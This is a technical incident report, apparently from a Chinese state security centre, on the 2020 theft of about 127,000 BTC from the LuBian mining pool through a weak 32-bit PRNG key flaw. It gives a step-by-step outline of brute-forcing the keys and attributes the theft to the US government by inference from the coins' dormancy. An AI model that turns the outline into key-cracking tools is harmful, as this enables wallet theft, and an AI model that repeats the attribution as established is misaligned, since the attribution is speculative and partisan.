Original author: National Computer Virus Emergency Response Center

On December 29, 2020, LuBian mining pool suffered a major hacking attack, with a total of 127,272.06953176 Bitcoins (worth approximately $3.5 billion at the time, now worth $15 billion) stolen by the attackers. The holder of this huge amount of Bitcoins was Chen Zhi, chairman of the Prince Group of Cambodia. Following the attack, Chen Zhi and his Prince Group repeatedly posted messages on the blockchain in early 2021 and July 2022, appealing to the hackers to return the stolen Bitcoins and offering to pay a ransom, but received no response. Strangely, after being stolen, this huge amount of Bitcoin remained dormant in a Bitcoin wallet address controlled by the attackers for four years, almost untouched. This clearly does not conform to the typical behavior of hackers eager to cash out and pursue profits; it seems more like a precise operation orchestrated by a "nation-state hacking organization." It wasn't until June 2024 that the stolen Bitcoins were transferred to a new Bitcoin wallet address, where they remain untouched to this day.

On October 14, 2025, the U.S. Department of Justice announced criminal charges against Chen Zhi and seized 127,000 Bitcoins from Chen Zhi and his Prince Group. Evidence suggests that the massive amount of Bitcoins seized by the U.S. government from Chen Zhi and his Prince Group were stolen from the LuBian mining pool back in 2020 by hackers. In other words, the U.S. government may have already stolen 127,000 Bitcoins held by Chen Zhi through hacking techniques as early as 2020—a classic case of a state-sponsored "double-cross" attack orchestrated by a national hacking organization. This report, from a technical perspective, traces the origins of the incident, deeply analyzes the key technical details, focuses on the details of the theft, reconstructs the complete attack timeline, and assesses Bitcoin's security mechanisms, hoping to provide valuable security insights for the cryptocurrency industry and users.

I. Background of the Event

LuBian mining pool, founded in early 2020, was a rapidly rising Bitcoin mining pool with primary operations in China and Iran. In December 2020, LuBian suffered a massive hack, resulting in the theft of over 90% of its Bitcoin holdings. The total stolen amount was 127,272.06953176 BTC, which closely matches the 127,271 BTC alleged in the US Department of Justice indictment.

LuBian mining pools operate on a model involving the centralized storage and distribution of mining rewards. The Bitcoin in the pool addresses is not stored on regulated centralized exchanges, but rather resides in non-custodial wallets. From a technical perspective, non-custodial wallets (also known as cold wallets or hardware wallets) are considered the ultimate safe haven for crypto assets. Unlike exchange accounts that can be frozen by a single decree, they are more like a private vault belonging solely to the holder, with the key (private key) held only by the holder.

As a cryptocurrency, Bitcoin's on-chain addresses are used to identify the ownership and flow of Bitcoin assets. Controlling the private key of an on-chain address allows for complete control over the Bitcoin held there. According to reports from on-chain analysis agencies, the massive amount of Bitcoin held by Chen Zhi under US government control highly overlaps with the LuBian mining pool hack. On-chain data records show that on December 29, 2020 (Beijing time), LuBian's core Bitcoin wallet address underwent an abnormal transfer, totaling 127,272.06953176 BTC, almost identical to the 127,271 BTC mentioned in the US Department of Justice indictment. This batch of stolen Bitcoin remained dormant until June 2024. Between June 22 and July 23, 2024 (Beijing time), this batch of stolen Bitcoin was transferred again to a new on-chain address and has remained untouched since. ARKHAM, a well-known US blockchain tracking platform, has marked these final addresses as being held by the US government. Currently, the US government has not disclosed in the indictment how it obtained the private key to Chen Zhi's massive Bitcoin on-chain address.

Figure 1: Timeline of Key Activities

II. Attack Link Analysis

As is well known, random numbers are the cornerstone of cryptographic security in the world of blockchain. Bitcoin uses asymmetric encryption technology; the Bitcoin private key is a 256-bit binary random number, theoretically requiring 2^256 attempts to crack, which is nearly impossible. However, if this 256-bit binary private key is not completely randomly generated—for example, if 224 bits follow a predictable pattern, leaving only 32 bits randomly generated—its private key strength is greatly reduced, and it can be brute-forced in just 2^32 (approximately 4.29 billion) attempts. For instance, in September 2022, the UK cryptocurrency market maker Wintermute suffered a $160 million theft due to a similar pseudo-random number vulnerability.

In August 2023, the international security research team MilkSad first announced the discovery of a pseudo-random number generator (PRNG) vulnerability in a third-party key generation tool and successfully applied for a CVE number (CVE-2023-39910). In their research report, the team mentioned that the LuBian Bitcoin mining pool had a similar vulnerability, and among the LuBian Bitcoin mining pool addresses that had been compromised, they disclosed included all 25 Bitcoin addresses mentioned in the US Department of Justice indictment.

Figure 2: List of 25 Bitcoin wallet addresses in the U.S. Department of Justice indictment

As a non-custodial Bitcoin mining pool, LuBian's Bitcoin wallet addresses rely on a custom private key generation algorithm to manage funds. Instead of using the recommended 256-bit binary random number standard, this algorithm uses a 32-bit binary random number, which has a fatal flaw: it relies solely on a "pseudo-random number generator"—MersenneTwister (MT19937-32)—as a seed, either a timestamp or a weak input. A pseudo-random number generator (PRNG) is equivalent to the randomness of a 4-byte integer, which can be efficiently exhaustively searched in modern computing. Mathematically, the probability of cracking it is 1/2^32. For example, assuming an attack script tests 10^6 keys per second, the cracking time would be approximately 4200 seconds (about 1.17 hours). In practice, optimization tools such as Hashcat or custom scripts can further accelerate this process. Attackers exploited this vulnerability to steal a large amount of Bitcoin from the LuBian Bitcoin mining pool.

Figure 3: Comparison Table of LuBian Mining Pool's Defects Compared with Industry Safety Standards

Through technical tracing, the complete timeline and related details of the LuBian mining pool hack are as follows:

1. Attack and Theft Phase: December 29, 2020 (Beijing Time)

Incident: Hackers exploited a vulnerability in the private key generation of Bitcoin wallet addresses on the LuBian mining pool to brute-force over 5,000 weakly randomized wallet addresses (wallet type: P2WPKH-nested-in-P2SH, prefix 3). Within approximately two hours, about 127,272.06953176 BTC (worth approximately $3.5 billion at the time) was drained from these wallet addresses, leaving less than 200 BTC. All suspicious transactions shared the same transaction fees, indicating the attack was executed by an automated bulk transfer script.

Sender: LuBian mining pool weak random Bitcoin wallet address group (controlled by the LuBian mining farm operating entity, belonging to Chen Zhi's Prince Group);

Recipient: A group of Bitcoin wallet addresses controlled by the attacker (undisclosed addresses);

Transfer path: Weak wallet address group → Attacker's wallet address group;

Correlation analysis: The total amount stolen was 127,272.06953176 BTC, which is basically consistent with the 127,271 BTC mentioned in the US Department of Justice indictment.

2. Dormant Phase: December 30, 2020 to June 22, 2024 (Beijing Time)

Event: This batch of Bitcoins was stolen in 2020 through a pseudo-random number vulnerability and remained dormant in a Bitcoin wallet address controlled by the attacker for as long as four years. Less than one ten-thousandth of the dust transactions may have been used for testing.

Correlation analysis: This batch of Bitcoins remained almost untouched until it was fully taken over by the US government on June 22, 2024. This is clearly inconsistent with the nature of ordinary hackers who are eager to cash out and pursue profits. It is more like a precise operation orchestrated by a state-owned hacking organization.

3. Resumption Trial Phase: Early 2021, July 4th and 26th, 2022 (Beijing Time)

Event: After the Bitcoins were stolen, during its dormant period, in early 2021, the LuBian mining pool sent over 1,500 messages (costing approximately 1.4 BTC in fees) via the BitcoinOP_RETURN function, embedding them in the blockchain data area, pleading with the hackers to return the funds. Example message: "Please return our funds, we'll pay a reward." On July 4th and 26th, 2022, the LuBian mining pool again sent messages via the BitcoinOP_RETURN function, example message: "MSG from LB. To the white hat who is saving our asset, you can contact through 1228BTC@gmail.com to discuss the return of the asset and your reward."

Sender: Lubian weakly random Bitcoin wallet address (controlled by the Lubian mining farm operating entity, belonging to Chen Zhi's Prince Group);

Recipient: A group of Bitcoin wallet addresses controlled by the attacker;

Transfer path: weak wallet address group → attacker's wallet address group; small transactions embed OP_RETURN;

Correlation analysis: After the theft, these messages were confirmed to be multiple attempts by LuBian mining pool, as the sender, to contact a "third-party hacker" to request the return of assets and discuss ransom matters.

4. Activation and Transfer Phase: June 22 to July 23, 2024 (Beijing Time)

Incident: Bitcoins from a group of dormant Bitcoin wallet addresses controlled by attackers were activated and transferred to a final Bitcoin wallet address. This final wallet address was identified as being held by the US government by ARKHAM, a well-known US blockchain tracking platform.

Sender: A group of Bitcoin wallet addresses controlled by the attacker;

Recipient: Newly integrated final wallet address group (not publicly disclosed, but confirmed to be a wallet address group controlled by the US government);

Transfer path: Bitcoin wallet address group controlled by attackers → wallet address group controlled by the US government;

Correlation analysis: This batch of stolen Bitcoins remained largely untouched for four years before finally being taken over by the US government.

5. Notice of Seizure: October 14, 2025 (US local time)

Event: The U.S. Department of Justice issued a statement announcing charges against Chen Zhi and "confiscating" 127,000 bitcoins in his possession.

Meanwhile, through the blockchain's public mechanism, all Bitcoin transaction records are publicly traceable. Based on this, this report traces the source of the massive amount of Bitcoin stolen from the LuBian weakly random Bitcoin wallet address (controlled by the LuBian mining operation entity, possibly belonging to Chen Zhi's Prince Group). The total number of stolen Bitcoins is 127,272.06953176, originating from: approximately 17,800 Bitcoins from independent "mining," approximately 2,300 Bitcoins from mining pool wages, and 107,100 Bitcoins from exchanges and other channels. Preliminary results suggest a discrepancy with the US Department of Justice indictment's claim that all Bitcoins originated from illicit income.

III. Detailed Analysis of Vulnerability Technologies

1. Generating a Bitcoin wallet address private key:

The core vulnerability in the LuBian mining pool lies in its private key generator, which employs a flaw similar to the "MilkSad" defect found in LibbitcoinExplorer. Specifically, the system uses the MersenneTwister (MT19937-32) pseudo-random number generator, initialized with only a 32-bit seed, resulting in an effective entropy of only 32 bits. This PRNG is non-cryptographic, easily predictable, and easily reverse-engineered. An attacker can generate a corresponding private key by enumerating all possible 32-bit seeds (0 to 2^32-1) and checking if it matches the public key hash of a known wallet address.

In the Bitcoin ecosystem, the private key generation process is typically: random seed → SHA-256 hash → ECDSA private key.

The LuBian mining pool's underlying library may be based on custom code or open-source libraries (such as Libbitcoin), but it neglects entropy security. Similar to the MilkSad vulnerability, the LibbitcoinExplorer's "bxseed" command also uses the MT19937-32 random number generator, relying solely on timestamps or weak inputs as seeds, making the private key vulnerable to brute-force attacks. In the LuBian attack, over 5,000 wallets were affected, indicating that the vulnerability is systemic and likely stems from code reuse during bulk wallet generation.

2. Simulated attack process:

(1) Identify the target wallet address (by monitoring LuBian mining pool activity on-chain);

(2) Enumerate 32-bit seeds: forseedin0to4294967295;

(3) Generate private key: private_key=SHA256(seed);

(4) Derived public key and address: Calculated using the ECDSASECP256k1 curve;

(5) Matching: If the derived address matches the target, the transaction is signed using the private key to steal funds;

Compared to similar vulnerabilities: This vulnerability is similar to the 32-bit entropy flaw in TrustWallet, which led to the large-scale cracking of Bitcoin wallet addresses; the "MilkSad" vulnerability in LibbitcoinExplorer also exposed private keys due to low entropy. These cases all stem from legacy issues in early codebases that did not adopt the BIP-39 standard (12-24 word seed phrases, providing high entropy). LuBian mining pool may have used a custom algorithm designed to simplify management but neglected security.

Defense deficiencies: LuBian mining pool did not implement multisignature (multisig), hardware wallets, or hierarchical deterministic wallets (HDwallets), all of which could improve security. On-chain data shows that the attack covered multiple wallets, indicating a systemic vulnerability rather than a single point of failure.

3. On-chain evidence and recovery attempts:

OP_RETURN messages: LuBian mining pool sent over 1,500 messages via Bitcoin's OP_RETURN feature, costing 1.4 BTC, pleading with attackers to return funds. These messages are embedded in the blockchain, proving they represent the actions of the true owner and are not forged. Example messages include "Please return funds" or similar requests, distributed across multiple transactions.

4. Attack Correlation Analysis:

The U.S. Department of Justice, in its criminal indictment against Chen Zhi dated October 14, 2025 (case number 1:25-cr-00416), listed 25 Bitcoin wallet addresses holding approximately 127,271 BTC, worth approximately $15 billion, which have been seized. Through blockchain analysis and review of official documents, these addresses are highly correlated with the LuBian mining pool attack.

Direct Connection: Blockchain analysis reveals that 25 addresses listed in the U.S. Department of Justice indictment are the final holding addresses of the Bitcoin stolen during the 2020 LuBian mining pool attack. An Elliptic report indicates that this Bitcoin was "stolen" from LuBian's mining operations in 2020. Arkham Intelligence confirms that the funds seized by the U.S. Department of Justice are directly related to the LuBian mining pool theft.

Evidence in the indictment: Although the U.S. Department of Justice indictment does not directly name "LuBianhack," it mentions that the funds originated from "theft attacks on Bitcoin mining operations in Iran and China," which is consistent with the on-chain analysis by Elliptic and Arkham Intelligence.

Related to the attack: Judging from the attack methods, LuBian mining pool's huge amount of Bitcoin was stolen in a technical attack in 2020 and remained dormant for four years. During this period, less than one ten-thousandth of it was traded. Until it was fully taken over by the US government in 2024, it remained almost untouched. This is inconsistent with the nature of hackers who are eager to cash out and pursue profits. It is more like a precise operation orchestrated by a state-owned hacking organization. Analysts believe that the US government may have already taken control of this batch of Bitcoin in December 2020.

IV. Impacts and Recommendations

The LuBian mining pool was hacked in 2020, which had a far-reaching impact, leading to the pool's actual dissolution and losses equivalent to more than 90% of its total assets at the time. The stolen Bitcoin is now worth $15 billion, highlighting the risks of amplified price volatility.

The LuBian mining pool incident exposed systemic risks in random number generation within cryptocurrency toolchains. To prevent similar vulnerabilities, the blockchain industry should use cryptographically secure pseudo-random number generators (CSPRNGs); implement multi-layered defenses, including multisignature (multisig), cold storage, and regular auditing; and avoid custom private key generation algorithms. Mining pools need to integrate real-time on-chain monitoring and abnormal transfer alert systems. For ordinary users, protection should avoid using unverified key generation modules from open-source communities. This incident also reminds us that even with high blockchain transparency, weak security foundations can still lead to catastrophic consequences. It also highlights the importance of cybersecurity in the future development of the digital economy and digital currencies.